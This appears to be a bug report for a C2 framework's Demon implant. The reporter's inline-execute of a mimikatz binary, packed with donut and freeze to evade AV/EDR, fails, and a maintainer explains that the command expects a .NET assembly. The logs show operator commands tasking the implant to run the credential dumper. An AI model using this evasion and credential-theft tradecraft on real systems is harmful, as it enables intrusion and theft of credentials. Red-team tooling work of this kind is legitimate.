[File a bug report for the Demon Implant]: Dottet inline execute issue

[pentestuser72]

What happened?

dotnet inline execute does not work when binaries have been run through donut and freeze to bypass AV/EDR. They execute fine on disk manually however they do not work when run through the inbuilt demon dotnet inline excute.

Did You Try With the Dev Branch?

Yes (You tried using the dev branch but the problem persists)

Relevant log output

20/10/2023 18:19:11 [5pider] Demon » dotnet inline-execute /home/kali/Desktop/safekatz.exe
[] [046E1F93] Tasked demon to inline execute a dotnet assembly: /home/kali/Desktop/safekatz.exe
[+] Send Task to Agent [166 bytes]
[] Using CLR Version: v4.0.30319
[!] Failed to execute assembly or initialize the clr

20/10/2023 18:32:52 [5pider] Demon » shell C:\Windows\Temp\safekatz.exe
[] [F42E0135] Tasked demon to execute a shell command
[+] Send Task to Agent [156 bytes]
[+] Received Output [403 bytes]:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com/ / https://mysmartlogon.com/ ***/

mimikatz #

Did You Read Over Your Issue First?

• [X] I declare I made an effort and provided the necessary information for replication of the issue.

[S4ntiagoP]

dotnet inline-execute expects a .NET assembly (meaning a C# executable), that is why this is failing.